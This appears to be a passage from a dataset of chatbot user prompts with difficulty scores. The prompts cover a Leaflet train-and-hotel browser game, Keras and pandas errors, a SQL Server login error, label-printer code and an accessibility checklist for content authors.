const coordinates = element.nodes.map(
(nodeId) => {
const node = data.elements.find(
(node) => node.id === nodeId
);
return [node.lat, node.lon];
}
);
// Create a polyline for the road
const polyline = L.polyline(coordinates, {
color: "#333333",
weight: 1,
}).addTo(map);
}
});
});
} else {
}
});
//buyhotel
const hoteloneMessage = document.createElement("p");
hoteloneMessage.textContent = `Open a hotel in ${firstCity} Station for £10,000.`;
instructionsElement.appendChild(hoteloneMessage);
// Add button element:
const hoteloneButton = document.createElement("button");
hoteloneButton.id = "trainbutton";
hoteloneButton.textContent = "Buy Hotel";
// Append the button element to the instructions element:
instructionsElement.appendChild(hoteloneButton);
//hotelonelogic
hoteloneButton.addEventListener("click", () => {
if (money >= 10000) {
generateDailyBonus(8000, 24000); // Call with cafe bonus range
hotelOneBonus = dailybonus;
money -= 10000;
const moneyDisplay =
document.getElementById("moneydisplay");
const moneyString = `£${money}`;
moneyDisplay.textContent = moneyString;
instructionsElement.removeChild(hoteloneButton);
instructionsElement.removeChild(hoteloneMessage);
//fetch data from Overpass API around first station
buildingRadius += 200;
const overpassQuery = `
[out:json];
way["building"](around:${buildingRadius},${firstCityCoords[1]},${firstCityCoords[0]});
out body;
>;
out skel qt;
`;
fetch("https://overpass-api.de/api/interpreter", {
method: "POST",
headers: {
"Content-Type": "application/x-www-form-urlencoded",
},
body: "data=" + encodeURIComponent(overpassQuery),
})
.then((response) => response.json())
.then((data) => {
// Process the data returned by the Overpass API
data.elements.forEach((element) => {
if (element.type === "way") {
// Extract coordinates from the way element
const coordinates = element.nodes.map(
(nodeId) => {
const node = data.elements.find(
(node) => node.id === nodeId
);
return [node.lat, node.lon];
}
);
// Create a polyline for the road
const polyline = L.polyline(coordinates, {
color: "#333333",
weight: 1,
}).addTo(map);
}
});
});
} else {
}
});
const hoteltwoMessage = document.createElement("p");
hoteltwoMessage.textContent = `Open a hotel in ${secondCity} Station for £10,000.`;
instructionsElement.appendChild(hoteltwoMessage);
// Add button element:
const hoteltwoButton = document.createElement("button");
hoteltwoButton.id = "trainbutton";
hoteltwoButton.textContent = "Buy Hotel";
// Append the button element to the instructions element:
instructionsElement.appendChild(hoteltwoButton);
//hotelonelogic
hoteltwoButton.addEventListener("click", () => {
if (money >= 10000) {
generateDailyBonus(8000, 24000); // Call with cafe bonus range
hotelTwoBonus = dailybonus;
money -= 10000;
const moneyDisplay =
document.getElementById("moneydisplay");
const moneyString = `£${money}`;
moneyDisplay.textContent = moneyString;
instructionsElement.removeChild(hoteltwoButton);
instructionsElement.removeChild(hoteltwoMessage);
//fetch data from Overpass API around first station
buildingRadius2 += 200;
const overpassQuery = `
[out:json];
way["building"](around:${buildingRadius2},${secondCityCoords[1]},${secondCityCoords[0]});
out body;
>;
out skel qt;
`;
fetch("https://overpass-api.de/api/interpreter", {
method: "POST",
headers: {
"Content-Type": "application/x-www-form-urlencoded",
},
body: "data=" + encodeURIComponent(overpassQuery),
})
.then((response) => response.json())
.then((data) => {
// Process the data returned by the Overpass API
data.elements.forEach((element) => {
if (element.type === "way") {
// Extract coordinates from the way element
const coordinates = element.nodes.map(
(nodeId) => {
const node = data.elements.find(
(node) => node.id === nodeId
);
return [node.lat, node.lon];
}
);
// Create a polyline for the road
const polyline = L.polyline(coordinates, {
color: "#333333",
weight: 1,
}).addTo(map);
}
});
});
} else {
}
});
//landdeveloper
if (cafeOneBonus > 0 && cafeTwoBonus > 0 && hotelOneBonus > 0 && hotelTwoBonus > 0) {
console.log("Conditions met! Adding circle markers.");
// Create green circle markers with radius 8
var greenCircleMarker1 = L.circleMarker(firstCityCoords, {
radius: 8,
color: 'green',
fillColor: 'green',
fillOpacity: 0.5
});
var greenCircleMarker2 = L.circleMarker(secondCityCoords, {
radius: 8,
color: 'green',
fillColor: 'green',
fillOpacity: 0.5
});
// Add markers to the map (assuming you have a map variable)
greenCircleMarker1.addTo(map);
greenCircleMarker2.addTo(map);
}
// starttrain
const firstPoint = L.latLng(
firstCityCoords[1],
firstCityCoords[0]
);
const secondPoint = L.latLng(
secondCityCoords[1],
secondCityCoords[0]
);
const intervalDuration = 10; // milliseconds per frame
const distance = firstPoint.distanceTo(secondPoint);
const steps = ((distance / speed) * 1000) / intervalDuration; // Assuming speed of 35 miles per hour
const latStep = (secondPoint.lat - firstPoint.lat) / steps;
const lngStep = (secondPoint.lng - firstPoint.lng) / steps;
const marker = L.marker(firstPoint, {
icon: L.divIcon({
className: "circle-marker", // Add a CSS class for styling (optional)
html: `<b>${numberOfCarriages}</b>`, // Include the number inside a bold tag
iconSize: [20, 20], // Adjust iconSize as needed (optional)
}),
}).addTo(map);
// Assuming the marker variable is defined in this scope
const markerContent = marker.getElement().querySelector("b"); // Assuming bold tag for number
const moveMarker = (speed) => {
if (progress < steps) {
const newLat = firstPoint.lat + latStep * progress;
const newLng = firstPoint.lng + lngStep * progress;
const newLatLng = L.latLng(newLat, newLng);
marker.setLatLng(newLatLng); // Update the marker's position
progress++;
setTimeout(function () {
moveMarker(speed);
}, intervalDuration);
} else {
// Marker reaches the second point, update money
money +=
Math.floor(Math.random() * (2000 - 1000 + 1)) +
1000 * numberOfCarriages;
const moneyDisplay =
document.getElementById("moneydisplay");
const moneyString = `£${money}`;
moneyDisplay.textContent = moneyString;
// Wait two seconds before animating back and call moveBackMarker recursively
setTimeout(() => {
moveBackMarker(speed);
}, 2000); // Wait for 2 seconds (2000 milliseconds)
}
};
const moveBackMarker = (speed) => {
// Corrected calculation for animating back from second point to first
if (progress > 0) {
const newLat =
secondPoint.lat - latStep * (steps - progress);
const newLng =
secondPoint.lng - lngStep * (steps - progress);
const newLatLng = L.latLng(newLat, newLng);
marker.setLatLng(newLatLng); // Update the marker's position
progress--;
setTimeout(function () {
moveBackMarker(speed);
}, intervalDuration);
} else {
console.log("Reached starting point again.");
// Add random number to money and update display
money +=
Math.floor(Math.random() * (2000 - 1000 + 1)) +
1000 * numberOfCarriages;
const moneyDisplay =
document.getElementById("moneydisplay");
const moneyString = `£${money}`;
moneyDisplay.textContent = moneyString;
// Reset progress for next round trip
progress = 0;
// Recursively call moveMarker to start next animation cycle
moveMarker(speed);
}
};
moveMarker(speed); // Start the animation
});
});
}
else {
selectedMarker = e.target; // Set the clicked marker as selected
// Optional visual indication for selection (e.g., reduce opacity)
}
}
});
return circleMarker;
},
});
}
fetch("gb.geojson")
.then((response) => response.json())
.then((geojson) => {
L.geoJSON(geojson, {
fillColor: "none", // Style for polygon (empty fill)
weight: 1,
color: "#000",
opacity: 1,
fillOpacity: 0,
}).addTo(map);
})
.catch((error) => {
console.error("Error loading GeoJSON:", error);
});
fetch("cities.geojson")
.then((response) => response.json())
.then((geojson) => {
createCircleMarkers(geojson).addTo(map);
})
.catch((error) => {
console.error("Error loading GeoJSON:", error);
});
//24 hour clock display
const TIME_MULTIPLIER = 60 * 10; // 10 minutes = 600 seconds
// Function to format time in 24-hour format with leading zeros
function formatTime(hours, minutes) {
// Handle the case where minutes reach 60 (should display the next hour)
if (minutes === 60) {
hours++;
minutes = 0;
}
return `${hours.toString().padStart(2, "0")}:${minutes
.toString()
.padStart(2, "0")}`;
}
// Function to update the clock display and handle daily bonus
function updateClock() {
const currentTime = new Date();
// Simulate game time by multiplying actual time with multiplier
const gameTime = new Date(currentTime.getTime() * TIME_MULTIPLIER);
// Get hours and minutes in 24-hour format
let hours = gameTime.getHours();
// Get minutes and force them to the nearest multiple of 10 (ending in 0)
let minutes = Math.floor(gameTime.getMinutes() / 10) * 10;
// Format the time string with fixed minute handling
const formattedTime = formatTime(hours, minutes);
// Update the content of the div with the formatted time
document.getElementById("timedisplay").textContent = formattedTime;
// Check if it's midnight (00:00)
if (hours === 0 && minutes === 0) {
// Generate random daily bonus (modify as needed)
money += cafeOneBonus + cafeTwoBonus + hotelOneBonus;
const moneyDisplay = document.getElementById("moneydisplay");
const moneyString = `£${money}`;
moneyDisplay.textContent = moneyString;
console.log(
`Daily bonus of ${
cafeOneBonus + cafeTwoBonus + hotelOneBonus + hotelTwoBonus
} added! Total money: ${money}`
); // You can replace console.log with your desired action
}
}
// Call the updateClock function initially
updateClock();
// Update the clock every second to simulate smooth time progression
setInterval(updateClock, 1000);
'
|
5206dedbb71e40d2d3a77c2213dd1b8a
|
{
"intermediate": 0.44431936740875244,
"beginner": 0.3869270086288452,
"expert": 0.16875363886356354
}
|
46,748
|
python asdl
|
8c0d22692f6e1478a65e50b26ce3015c
|
{
"intermediate": 0.3639878034591675,
"beginner": 0.334367573261261,
"expert": 0.30164462327957153
}
|
46,749
|
inputs = tf.keras.Input(shape=(1,200,))
x = tf.keras.layers.Embedding(64)(inputs)
x = layers.LSTM(200, return_sequences=True)(inputs)
x = layers.LSTM(64, return_sequences=True)(x)
x = layers.LSTM(64, return_sequences=True)(x)
x = layers.LSTM(64, return_sequences=True)(x)
x = layers.LSTM(128, return_sequences=True)(x)
x = layers.LSTM(256, return_sequences=True)(x)
x = layers.LSTM(64, return_sequences=True)(x)
x = layers.LSTM(64, return_sequences=True)(x)
x = layers.LSTM(64, return_sequences=True)(x)
x = layers.LSTM(128, return_sequences=True)(x)
x = layers.LSTM(256, return_sequences=True)(x)
outputs = layers.Dense(200)(x)
model = tf.keras.Model(inputs=inputs, outputs=outputs)
model.summary()
---------------------------------------------------------------------------
TypeError Traceback (most recent call last)
<ipython-input-103-15a76a050f6a> in <cell line: 5>()
3
4
----> 5 x = tf.keras.layers.Embedding(64)(inputs)
6 x = layers.LSTM(200, return_sequences=True)(inputs)
7 x = layers.LSTM(64, return_sequences=True)(x)
TypeError: Embedding.__init__() missing 1 required positional argument: 'output_dim'
|
31dd9cf84fd59fcb32f629ad1bbb2367
|
{
"intermediate": 0.3665541410446167,
"beginner": 0.28056877851486206,
"expert": 0.35287711024284363
}
|
46,750
|
INTROGRESSIONE in miglioramento genetico
|
11063cab46ae9af668a5137130ed8555
|
{
"intermediate": 0.30194586515426636,
"beginner": 0.2571144998073578,
"expert": 0.44093963503837585
}
|
46,751
|
Login failed for user 'DESKTOP-21QL7RI\hp'. Reason: Server is in single user mode. Only one administrator can connect at this time. ما حل هذه المشكلة
|
de301ef503c186e7591c6aa523a60745
|
{
"intermediate": 0.3058943450450897,
"beginner": 0.34316983819007874,
"expert": 0.35093584656715393
}
|
46,752
|
sup
|
aff8407e1ec46964afd2ca330b9641e2
|
{
"intermediate": 0.3241104781627655,
"beginner": 0.3006082773208618,
"expert": 0.37528130412101746
}
|
46,753
|
How to handle user disconnect Colyseus server side
|
929557b7210dace2ac5efb1360ae30f9
|
{
"intermediate": 0.39433035254478455,
"beginner": 0.26746997237205505,
"expert": 0.3381996750831604
}
|
46,754
|
"fifo_full, fifo_empty, fifo_wren, fifo_rden를 사용해서 FIFO를 사용하도록 코드를 수정하시오."를 영작해줘.
|
edd95dc30bd5dcd5ee6ebd21bb6a91a1
|
{
"intermediate": 0.20124953985214233,
"beginner": 0.6427111625671387,
"expert": 0.1560393124818802
}
|
46,755
|
what type of layer i should use for tanslation model ?
|
b89533ce31f40029038eaca4c12288ac
|
{
"intermediate": 0.12264930456876755,
"beginner": 0.12161096185445786,
"expert": 0.7557397484779358
}
|
46,756
|
Make a minimax tic tac-toe AI, that meets the specific requirements in this category, and don't worry if it's too extensive:
1. Evaluation Function
- Evaluation Heuristics
2. Iterative Deepening
- Alpha-Beta Pruning
- Quiescence Search
3. Transposition Table
4. Move Ordering
- Transposition Move
- Good Captures
- Killer Moves
- Bad Captures
- History Heuristic
5. Repeat Detection
6. Aspiration Window
7. Principal Variation Search (PVS)
8. Root Node Optimization
9. Simple Time Management
10. Mate Distance Pruning
Required Modules:
- Board Representation Module
- Minimax Algorithm Module
- Alpha-Beta Pruning Module
- Evaluation Function Module
- Transposition Table Module
- Move Ordering Module
- Repeat Detection Module
- Time Management Module
- Mate Distance Pruning Module
|
74c02da91fe2df4d1b282e65bbe7fda3
|
{
"intermediate": 0.08922035992145538,
"beginner": 0.12124685943126678,
"expert": 0.7895327806472778
}
|
46,757
|
while running project using ng serve the prompt window open with windows script host
|
973ee2b2122aa6700d28528a8d7f5975
|
{
"intermediate": 0.366978257894516,
"beginner": 0.2812768816947937,
"expert": 0.3517448604106903
}
|
46,758
|
Hi , I am accessibility consultant and working on checklist for Content author , i have created one check list buy my manager is not happy with that and he is asking to provide mention details in different format. I am providing you the checklist details which i have created
"S. No. Content Author Checklist Category Status
1 Images meant for decorative purpose should be having an empty alternative text (alt=""). Images
2 Provide descriptive alternative text for all the informative images. Images
3 For complex images descriptive alternate content should be provided. Images
4 Pre-recorded audio-only content - A descriptive text transcript should be provided Multimedia
5 Pre-recorded video-only content(no audio track) - Either a text transcript or audio description could be provided. Multimedia
6 For pre-recorded audio, synchronized captions should be provided unless the media is a media alternative for text that is clearly labeled as such. Multimedia
7 For pre-recorded video content (unless the media is a media alternative for text and is clearly labeled as such) Multimedia
8 Synchronized captions should be provided for all live multimedia that contains audio (audio-only broadcasts, web casts, video conferences, Flash animations, etc.). Multimedia
9 For Headings, H1-H6 should be provided in a hierarchical manner to navigate through section and sub sections. Navigation
10 Form fields should have visual indication of 'required' fields either using a "*" indication or a global static text. Forms
11 Placeholder attribute/text should not be used as an alternate to labels. Forms
12 Group the contents that logically fall into a list as Ordered list/Unordered list Links
14 Table should be having relevant headers Table
17 Make sure that content presented on the page is logical & intuitive. The visual order should matches the reading order. Navigation
18 While using shape and or location, provide visible labels/names to the controls. Content
19 When combining color and shape/size/location/orientation, provide off-screen text for screen reader users. Content
20 When using sound as a clue, combine it with text/color based clues. Content
22 Browser title(page title) should be provided with clear, concise, and context-relevant about the page. Navigation
23 The purpose of each link (or form image button) should be determined from the link text alone, or from the link text and it's context. Links
24 For the links/buttons with the same text that go to different locations should be readily distinguishable by means of additional content. Links
26 Users should be informed about links that open non-HTML resources, such as PDF files, Word files, PowerPoint files. Links
27 Page/Section Headings and labels should describe their topic or its purpose. Navigation
28 Ensure the language of the web page or part of page is declared using the lang attribute Content
29 Provide sufficient labels, instructions, and data formats are provided well ahead to fill appropriate data into input fields. Forms
30 "
Make sure that errors are distinguished from the regular text on the web page using descriptive text.
" Forms
31 Provide visible hints that will enable the users to avoid errors during form submissions. Forms
"The above defined Content Author Checklist points are created based on maximal coverage for Content Accessibility. The feasibility of fixing the defect depends on the Content Author Tool used by the Client/Project Team.
Note: Some tools in the market have option to hand code and some don't have access to basic scripts."
"
|
af8e28c22d207d19e9662898fe61a03b
|
{
"intermediate": 0.3887779712677002,
"beginner": 0.2871059775352478,
"expert": 0.3241160809993744
}
|
46,759
|
i have following code to read my csv file which is a 27GB size file
import pandas as pd
# Load the dataset using pandas
df = pd.read_csv(r"C:\Users\arisa\Desktop\combined_day.csv")
and im getting following error:
{
"name": "MemoryError",
"message": "Unable to allocate 13.7 GiB for an array with shape (6317, 290138) and data type float64",
"stack": "---------------------------------------------------------------------------
MemoryError Traceback (most recent call last)
Cell In[1], line 3
1 import pandas as pd
2 # Load the dataset using pandas
----> 3 df = pd.read_csv(r\"C:\\Users\\arisa\\Desktop\\combined_day.csv\")
File c:\\Users\\arisa\\AppData\\Local\\Programs\\Python\\Python310\\lib\\site-packages\\pandas\\io\\parsers\\readers.py:1026, in read_csv(filepath_or_buffer, sep, delimiter, header, names, index_col, usecols, dtype, engine, converters, true_values, false_values, skipinitialspace, skiprows, skipfooter, nrows, na_values, keep_default_na, na_filter, verbose, skip_blank_lines, parse_dates, infer_datetime_format, keep_date_col, date_parser, date_format, dayfirst, cache_dates, iterator, chunksize, compression, thousands, decimal, lineterminator, quotechar, quoting, doublequote, escapechar, comment, encoding, encoding_errors, dialect, on_bad_lines, delim_whitespace, low_memory, memory_map, float_precision, storage_options, dtype_backend)
1013 kwds_defaults = _refine_defaults_read(
1014 dialect,
1015 delimiter,
(...)
1022 dtype_backend=dtype_backend,
1023 )
1024 kwds.update(kwds_defaults)
-> 1026 return _read(filepath_or_buffer, kwds)
File c:\\Users\\arisa\\AppData\\Local\\Programs\\Python\\Python310\\lib\\site-packages\\pandas\\io\\parsers\\readers.py:626, in _read(filepath_or_buffer, kwds)
623 return parser
625 with parser:
--> 626 return parser.read(nrows)
File c:\\Users\\arisa\\AppData\\Local\\Programs\\Python\\Python310\\lib\\site-packages\\pandas\\io\\parsers\\readers.py:1968, in TextFileReader.read(self, nrows)
1965 else:
1966 new_col_dict = col_dict
-> 1968 df = DataFrame(
1969 new_col_dict,
1970 columns=columns,
1971 index=index,
1972 copy=not using_copy_on_write(),
1973 )
1975 self._currow += new_rows
1976 return df
File c:\\Users\\arisa\\AppData\\Local\\Programs\\Python\\Python310\\lib\\site-packages\\pandas\\core\\frame.py:778, in DataFrame.__init__(self, data, index, columns, dtype, copy)
772 mgr = self._init_mgr(
773 data, axes={\"index\": index, \"columns\": columns}, dtype=dtype, copy=copy
774 )
776 elif isinstance(data, dict):
777 # GH#38939 de facto copy defaults to False only in non-dict cases
--> 778 mgr = dict_to_mgr(data, index, columns, dtype=dtype, copy=copy, typ=manager)
779 elif isinstance(data, ma.MaskedArray):
780 from numpy.ma import mrecords
File c:\\Users\\arisa\\AppData\\Local\\Programs\\Python\\Python310\\lib\\site-packages\\pandas\\core\\internals\\construction.py:503, in dict_to_mgr(data, index, columns, dtype, typ, copy)
499 else:
500 # dtype check to exclude e.g. range objects, scalars
501 arrays = [x.copy() if hasattr(x, \"dtype\") else x for x in arrays]
--> 503 return arrays_to_mgr(arrays, columns, index, dtype=dtype, typ=typ, consolidate=copy)
File c:\\Users\\arisa\\AppData\\Local\\Programs\\Python\\Python310\\lib\\site-packages\\pandas\\core\\internals\\construction.py:152, in arrays_to_mgr(arrays, columns, index, dtype, verify_integrity, typ, consolidate)
149 axes = [columns, index]
151 if typ == \"block\":
--> 152 return create_block_manager_from_column_arrays(
153 arrays, axes, consolidate=consolidate, refs=refs
154 )
155 elif typ == \"array\":
156 return ArrayManager(arrays, [index, columns])
File c:\\Users\\arisa\\AppData\\Local\\Programs\\Python\\Python310\\lib\\site-packages\\pandas\\core\\internals\\managers.py:2144, in create_block_manager_from_column_arrays(arrays, axes, consolidate, refs)
2142 raise_construction_error(len(arrays), arrays[0].shape, axes, e)
2143 if consolidate:
-> 2144 mgr._consolidate_inplace()
2145 return mgr
File c:\\Users\\arisa\\AppData\\Local\\Programs\\Python\\Python310\\lib\\site-packages\\pandas\\core\\internals\\managers.py:1788, in BlockManager._consolidate_inplace(self)
1782 def _consolidate_inplace(self) -> None:
1783 # In general, _consolidate_inplace should only be called via
1784 # DataFrame._consolidate_inplace, otherwise we will fail to invalidate
1785 # the DataFrame's _item_cache. The exception is for newly-created
1786 # BlockManager objects not yet attached to a DataFrame.
1787 if not self.is_consolidated():
-> 1788 self.blocks = _consolidate(self.blocks)
1789 self._is_consolidated = True
1790 self._known_consolidated = True
File c:\\Users\\arisa\\AppData\\Local\\Programs\\Python\\Python310\\lib\\site-packages\\pandas\\core\\internals\\managers.py:2269, in _consolidate(blocks)
2267 new_blocks: list[Block] = []
2268 for (_can_consolidate, dtype), group_blocks in grouper:
-> 2269 merged_blocks, _ = _merge_blocks(
2270 list(group_blocks), dtype=dtype, can_consolidate=_can_consolidate
2271 )
2272 new_blocks = extend_blocks(merged_blocks, new_blocks)
2273 return tuple(new_blocks)
File c:\\Users\\arisa\\AppData\\Local\\Programs\\Python\\Python310\\lib\\site-packages\\pandas\\core\\internals\\managers.py:2301, in _merge_blocks(blocks, dtype, can_consolidate)
2298 new_values = bvals2[0]._concat_same_type(bvals2, axis=0)
2300 argsort = np.argsort(new_mgr_locs)
-> 2301 new_values = new_values[argsort]
2302 new_mgr_locs = new_mgr_locs[argsort]
2304 bp = BlockPlacement(new_mgr_locs)
MemoryError: Unable to allocate 13.7 GiB for an array with shape (6317, 290138) and data type float64"
}
|
1e25409d6cdaf3595f3e0a8a8491bdd7
|
{
"intermediate": 0.4779605269432068,
"beginner": 0.324287474155426,
"expert": 0.1977519690990448
}
|
46,760
|
hello
|
cef37ab84704158b206902ce90358bb8
|
{
"intermediate": 0.32064199447631836,
"beginner": 0.28176039457321167,
"expert": 0.39759764075279236
}
|
46,761
|
i want to train a NN model on my dataset which is a 27GB size csv file
i cant read it as df = pd.read_csv(r"C:\Users\arisa\Desktop\combined_day.csv") because it gives error due to big size of the file
give me proper code to train a model on my dataset properly
|
727d3094fe95f2128c62437577716804
|
{
"intermediate": 0.2399674355983734,
"beginner": 0.06087492033839226,
"expert": 0.6991576552391052
}
|
46,762
|
my code:
# %%
import numpy as np
from sklearn.preprocessing import StandardScaler
# %%
import pandas as pd
chunk_size = 10000 # This depends on your available memory
batch_size = 72
# %%
def data_generator():
reader = pd.read_csv(r"C:\Users\arisa\Desktop\combined_day.csv", chunksize=chunk_size)
for chunk in reader:
X = chunk.drop([
'Date', 'Symbol',
'y_High_1d', 'y_Low_1d', 'y_Priority_1d',
'y_High_2d', 'y_Low_2d', 'y_Priority_2d',
'y_High_3d', 'y_Low_3d', 'y_Priority_3d',
'y_High_5d', 'y_Low_5d', 'y_Priority_5d'], axis=1).values
Y = chunk[['y_High_1d', 'y_Low_1d', 'y_Priority_1d',
'y_High_2d', 'y_Low_2d', 'y_Priority_2d',
'y_High_3d', 'y_Low_3d', 'y_Priority_3d',
'y_High_5d', 'y_Low_5d', 'y_Priority_5d']].values
xScaler = StandardScaler()
yScaler = StandardScaler()
X_scaled = xScaler.fit_transform(X)
Y_scaled = yScaler.fit_transform(Y)
# Yield batches
for i in range(0, len(X_scaled), batch_size):
X_batch = X_scaled.iloc[i:i+batch_size]
y_batch = Y_scaled[i:i+batch_size]
yield np.array(X_batch), np.array(y_batch)
# %%
from tensorflow.keras.layers import Dense, Dropout
from tensorflow.keras import Model
from tensorflow.keras.layers import Input, Dropout
def build_model():
input_shape = (72, 6427)
inputs = Input(shape=input_shape) # Corrected the input shape specification
x = Dense(6427, activation='relu')(inputs)
x = Dropout(0.25) (x)
x = Dense(3200, activation='relu') (x)
x = Dropout(0.20) (x)
x = Dense(1800, activation='relu') (x)
x = Dropout(0.15) (x)
x = Dense(1024, activation='relu') (x)
x = Dropout(0.10) (x)
x = Dense(512, activation='relu') (x)
x = Dropout(0.05) (x)
x = Dense(256, activation='relu') (x)
x = Dense(128, activation='relu') (x)
x = Dense(64, activation='relu') (x)
x = Dense(32, activation='relu') (x)
# Defining three separate outputs
out_high_1d = Dense(1, name='high_output_1d')(x) # No activation, linear output
out_low_1d = Dense(1, name='low_output_1d')(x) # No activation, linear output
out_priority_1d = Dense(1, activation='sigmoid', name='priority_output_1d')(x)
out_high_2d = Dense(1, name='high_output_2d')(x) # No activation, linear output
out_low_2d = Dense(1, name='low_output_2d')(x) # No activation, linear output
out_priority_2d = Dense(1, activation='sigmoid', name='priority_output_2d')(x)
out_high_3d = Dense(1, name='high_output_3d')(x) # No activation, linear output
out_low_3d = Dense(1, name='low_output_3d')(x) # No activation, linear output
out_priority_3d = Dense(1, activation='sigmoid', name='priority_output_3d')(x)
out_high_5d = Dense(1, name='high_output_5d')(x) # No activation, linear output
out_low_5d = Dense(1, name='low_output_5d')(x) # No activation, linear output
out_priority_5d = Dense(1, activation='sigmoid', name='priority_output_5d')(x)
# Constructing the model
model = Model(inputs=inputs, outputs=[
out_high_1d, out_low_1d, out_priority_1d,out_high_2d, out_low_2d, out_priority_2d,
out_high_3d, out_low_3d, out_priority_3d,out_high_5d, out_low_5d, out_priority_5d])
model.compile(optimizer='adam',
loss={
'high_output_1d': 'mse', 'low_output_1d': 'mse', 'priority_output_1d': 'binary_crossentropy',
'high_output_2d': 'mse', 'low_output_2d': 'mse', 'priority_output_2d': 'binary_crossentropy',
'high_output_3d': 'mse', 'low_output_3d': 'mse', 'priority_output_3d': 'binary_crossentropy',
'high_output_5d': 'mse', 'low_output_5d': 'mse', 'priority_output_5d': 'binary_crossentropy'
},
metrics={
'high_output_1d': ['mae'], 'low_output_1d': ['mae'], 'priority_output_1d': ['accuracy'],
'high_output_2d': ['mae'], 'low_output_2d': ['mae'], 'priority_output_2d': ['accuracy'],
'high_output_3d': ['mae'], 'low_output_3d': ['mae'], 'priority_output_3d': ['accuracy'],
'high_output_5d': ['mae'], 'low_output_5d': ['mae'], 'priority_output_5d': ['accuracy']
},
loss_weights={
'high_output_1d': 1.0, 'low_output_1d': 1.0, 'priority_output_1d': 1.0,
'high_output_2d': 1.0, 'low_output_2d': 1.0, 'priority_output_2d': 1.0,
'high_output_3d': 1.0, 'low_output_3d': 1.0, 'priority_output_3d': 1.0,
'high_output_5d': 1.0, 'low_output_5d': 1.0, 'priority_output_5d': 1.0
}
)
return model
# %%
model = build_model()
history = model.fit(data_generator(), steps_per_epoch=100, epochs=10)
error:
{
"name": "ValueError",
"message": "Input 0 of layer \"functional_9\" is incompatible with the layer: expected shape=(None, 72, 6427), found shape=(None, 6427)",
"stack": "---------------------------------------------------------------------------
ValueError Traceback (most recent call last)
Cell In[25], line 5
1 model = build_model()
3 # history = model.fit(X_train, y_train, epochs=20, batch_size=64,
4 # validation_data=(X_dev, y_dev))
----> 5 history = model.fit(data_generator(), steps_per_epoch=100, epochs=10)
File c:\\Users\\arisa\\AppData\\Local\\Programs\\Python\\Python310\\lib\\site-packages\\keras\\src\\utils\\traceback_utils.py:122, in filter_traceback.<locals>.error_handler(*args, **kwargs)
119 filtered_tb = _process_traceback_frames(e.__traceback__)
120 # To get the full stack trace, call:
121 # `keras.config.disable_traceback_filtering()`
--> 122 raise e.with_traceback(filtered_tb) from None
123 finally:
124 del filtered_tb
File c:\\Users\\arisa\\AppData\\Local\\Programs\\Python\\Python310\\lib\\site-packages\\keras\\src\\layers\\input_spec.py:245, in assert_input_compatibility(input_spec, inputs, layer_name)
243 if spec_dim is not None and dim is not None:
244 if spec_dim != dim:
--> 245 raise ValueError(
246 f'Input {input_index} of layer \"{layer_name}\" is '
247 \"incompatible with the layer: \"
248 f\"expected shape={spec.shape}, \"
249 f\"found shape={shape}\"
250 )
ValueError: Input 0 of layer \"functional_9\" is incompatible with the layer: expected shape=(None, 72, 6427), found shape=(None, 6427)"
}
|
0f47d2f487ff6eac7c1ac68ec929f034
|
{
"intermediate": 0.3507901728153229,
"beginner": 0.4262188971042633,
"expert": 0.222990944981575
}
|
46,763
|
WHat is this code and what does it do?
U1 setvar "device.languages" "zpl"
N
ZB
S3
D10
R02,0
q240
Q160,120
A05,135,3,2,1,1,N,""
B30,10,0,1C,2,7,75,B,"9930348263"
I8,C,001
A30,118,0,1,1,1,N,""
A20,137,0,1,1,1,N,""
P1
|
020fb1bad9d99562ca5dfc778f10ec61
|
{
"intermediate": 0.37532463669776917,
"beginner": 0.45593997836112976,
"expert": 0.16873544454574585
}
|
46,764
|
code:
# %%
from sklearn.preprocessing import StandardScaler
import numpy as np
from sklearn.preprocessing import StandardScaler
# %%
import pandas as pd
chunk_size = 10000 # This depends on your available memory
batch_size = 72
# %%
def data_generator():
reader = pd.read_csv(r"C:\Users\arisa\Desktop\combined_day.csv", chunksize=chunk_size)
for chunk in reader:
X = chunk.drop([
'Date', 'Symbol',
'y_High_1d', 'y_Low_1d', 'y_Priority_1d',
'y_High_2d', 'y_Low_2d', 'y_Priority_2d',
'y_High_3d', 'y_Low_3d', 'y_Priority_3d',
'y_High_5d', 'y_Low_5d', 'y_Priority_5d'], axis=1).values
Y = chunk[['y_High_1d', 'y_Low_1d', 'y_Priority_1d',
'y_High_2d', 'y_Low_2d', 'y_Priority_2d',
'y_High_3d', 'y_Low_3d', 'y_Priority_3d',
'y_High_5d', 'y_Low_5d', 'y_Priority_5d']].values
xScaler = StandardScaler()
yScaler = StandardScaler()
X_scaled = xScaler.fit_transform(X)
Y_scaled = yScaler.fit_transform(Y)
# Yield batches
for i in range(0, len(X_scaled), batch_size):
X_batch = X_scaled.iloc[i:i+batch_size]
y_batch = Y_scaled[i:i+batch_size]
yield np.array(X_batch), np.array(y_batch)
# %%
from tensorflow.keras.layers import Dense, Dropout
from tensorflow.keras import Model
from tensorflow.keras.layers import Input, Dropout
def build_model():
input_shape = (6427,)
inputs = Input(shape=input_shape) # Corrected the input shape specification
x = Dense(6427, activation='relu')(inputs)
x = Dropout(0.25) (x)
x = Dense(3200, activation='relu') (x)
x = Dropout(0.20) (x)
x = Dense(1800, activation='relu') (x)
x = Dropout(0.15) (x)
x = Dense(1024, activation='relu') (x)
x = Dropout(0.10) (x)
x = Dense(512, activation='relu') (x)
x = Dropout(0.05) (x)
x = Dense(256, activation='relu') (x)
x = Dense(128, activation='relu') (x)
x = Dense(64, activation='relu') (x)
x = Dense(32, activation='relu') (x)
# Defining three separate outputs
out_high_1d = Dense(1, name='high_output_1d')(x) # No activation, linear output
out_low_1d = Dense(1, name='low_output_1d')(x) # No activation, linear output
out_priority_1d = Dense(1, activation='sigmoid', name='priority_output_1d')(x)
out_high_2d = Dense(1, name='high_output_2d')(x) # No activation, linear output
out_low_2d = Dense(1, name='low_output_2d')(x) # No activation, linear output
out_priority_2d = Dense(1, activation='sigmoid', name='priority_output_2d')(x)
out_high_3d = Dense(1, name='high_output_3d')(x) # No activation, linear output
out_low_3d = Dense(1, name='low_output_3d')(x) # No activation, linear output
out_priority_3d = Dense(1, activation='sigmoid', name='priority_output_3d')(x)
out_high_5d = Dense(1, name='high_output_5d')(x) # No activation, linear output
out_low_5d = Dense(1, name='low_output_5d')(x) # No activation, linear output
out_priority_5d = Dense(1, activation='sigmoid', name='priority_output_5d')(x)
# Constructing the model
model = Model(inputs=inputs, outputs=[
out_high_1d, out_low_1d, out_priority_1d,out_high_2d, out_low_2d, out_priority_2d,
out_high_3d, out_low_3d, out_priority_3d,out_high_5d, out_low_5d, out_priority_5d])
model.compile(optimizer='adam',
loss={
